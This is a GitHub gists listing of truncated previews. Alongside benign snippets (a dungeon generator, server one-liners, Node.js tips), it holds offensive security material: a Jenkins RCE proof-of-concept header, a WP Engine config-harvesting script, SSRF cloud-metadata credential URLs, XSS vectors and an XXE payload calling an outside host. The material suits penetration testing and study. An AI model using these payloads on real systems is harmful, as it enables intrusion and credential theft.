bl4de / generate.c

Created March 4, 2019 11:26 — forked from munificent/generate.c

A random dungeon generator that fits on a business card

	#include <time.h> // Robert Nystrom
	#include <stdio.h> // @munificentbob
	#include <stdlib.h> // for Ginny
	#define r return // 2008-2019
	#define l(a, b, c, d) for (i y=a;y\
	<b; y++) for (int x = c; x < d; x++)
	typedef int i;const i H=40;const i W
	=80;i m[40][80];i g(i x){r rand()%x;
	}void cave(i s){i w=g(10)+5;i h=g(6)
	+3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u

bl4de / CVE-2019-1003000-Jenkins-RCE-POC.py

Created February 18, 2019 16:07 — forked from adamyordan/CVE-2019-1003000-Jenkins-RCE-POC.py

CVE-2019-1003000-Jenkins-RCE-POC

	#!/usr/bin/python

	# Author: Adam Jordan
	# Date: 2019-02-15
	# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
	# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


	import argparse
	import jenkins

bl4de / introspection_urlencoded.txt

Created February 7, 2019 23:37 — forked from localh0t/introspection_urlencoded.txt

Introspection query from GraphQL-JS (URL-encoded)

%0A%20%20query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20subscriptionType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields(includeDeprecated%3A%20true)%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A

bl4de / wpeprivate-config.sh

Created January 23, 2019 08:46 — forked from hateshape/wpeprivate-config.sh

	#!/bin/bash
	# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
	# If it "no worked" (Technical Term) then you probably need to install jq!

	TARGET=$1
	TARGETDOMAIN=$(echo $TARGET \| cut -d/ -f3)

	# Pretty Colors
	RESET='\033[00m'
	GREEN='\033[01;32m'

bl4de / web-servers.md

Created October 23, 2018 03:51 — forked from willurd/web-servers.md

Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

bl4de / cloud_metadata.txt

Created July 8, 2018 15:28 — forked from jhaddix/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

bl4de / better-nodejs-require-paths.md

Created June 6, 2018 13:54 — forked from branneman/better-nodejs-require-paths.md

Better local require() paths for Node.js

Problem

When the directory structure of your Node.js application (not library!) has some depth, you end up with a lot of annoying relative paths in your require calls like:

var Article = require('../../../models/article');

Those suck for maintenance and they're ugly.

Possible solutions

bl4de / 666_lines_of_XSS_vectors.html

Created November 27, 2017 12:38 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html

666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L

	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>

bl4de / XXE_payloads

Created November 23, 2017 22:17 — forked from staaldraad/XXE_payloads

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>